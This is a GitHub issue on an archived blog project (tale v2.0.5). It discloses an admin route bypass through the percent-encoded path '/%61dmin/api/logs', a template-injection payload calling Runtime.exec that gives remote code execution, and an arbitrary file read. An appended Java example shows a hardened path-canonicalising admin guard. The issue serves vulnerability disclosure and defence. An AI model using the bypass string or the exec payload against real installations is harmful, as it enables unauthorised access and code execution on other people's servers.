This repository has been archived by the owner on May 18, 2024. It is now read-only.

There is a security problem with admin route verification, which leads to direct access without login #602

Open
Siebene opened this issue Jan 11, 2022 · 0 comments

Comments


Siebene commented Jan 11, 2022

Easy bypass: /%61dmin/api/logs

For POST requests, you only need to configure the X-CSRF-TOKEN request header and the corresponding session.
Therefore, an attacker can directly modify the template file to get RCE.

And the template engine does not enable the sandbox, which makes it particularly easy for attackers.
You just need to set the parameter content to
#set(in=new java.io.InputStreamReader(java.lang.Runtime::getRuntime().exec('xxx').getInputStream()))#set(buf=new java.io.BufferedReader(in))
Then visit the page.
(At the same time, the route /admin/api/template/save has an arbitrary file read.)
Env:
Win10
JDK8u261
tale v2.0.5
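As an added defender's example (not tale's own code; class and method names are hypothetical): the raw-prefix check the report describes beside a guard that canonicalises the request path before the /admin decision and fails closed when no safe canonical form exists.

```java
import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;

// Added example, not tale's own code. A guard for the /admin routes that decides on the
// canonical request path instead of the raw URI. Names are hypothetical.
public final class AdminPathGuard {
    private static final String ADMIN_PREFIX = "/admin";

    /** Weak form (mirrors the report): a prefix test on the raw URI misses "/%61dmin/...". */
    static boolean weakIsAdmin(String rawPath) {
        return rawPath.startsWith(ADMIN_PREFIX);
    }

    /**
     * Canonicalise before any authorisation decision: percent-decode until stable (covers
     * double encoding), reject control characters, collapse "//", resolve "." and "..".
     * Returns null when no safe canonical form exists; callers must treat null as deny.
     */
    static String canonicalPath(String rawPath) {
        if (rawPath == null || !rawPath.startsWith("/")) return null;
        String decoded = rawPath;
        try {
            for (int i = 0; i < 5; i++) {                  // bounded, so "%2525..." cannot spin
                String next = URLDecoder.decode(decoded, "UTF-8"); // note: also maps '+' to ' '
                if (next.equals(decoded)) break;
                decoded = next;
            }
        } catch (IllegalArgumentException | UnsupportedEncodingException e) {
            return null;                                   // truncated or invalid %XX
        }
        for (char c : decoded.toCharArray()) if (c < 0x20 || c == 0x7f) return null;
        String collapsed = decoded.replaceAll("/{2,}", "/");
        try {
            String norm = new URI(null, null, collapsed, null).normalize().getPath();
            if (norm == null || !norm.startsWith("/")) return null;
            for (String seg : norm.split("/")) if (seg.equals("..")) return null; // escaped root
            return norm;
        } catch (URISyntaxException e) {
            return null;
        }
    }

    /** Hardened form: decide on the canonical path and fail closed when it cannot be formed. */
    static boolean requiresAdminLogin(String rawPath) {
        String p = canonicalPath(rawPath);
        if (p == null) return true;
        return p.equals(ADMIN_PREFIX) || p.startsWith(ADMIN_PREFIX + "/");
    }
}
```

Even with canonicalisation, a string prefix test is a stopgap; the durable fix is to attach the login requirement to the admin handlers themselves (route-level authorisation) so that no encoding of the URI can route around it.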
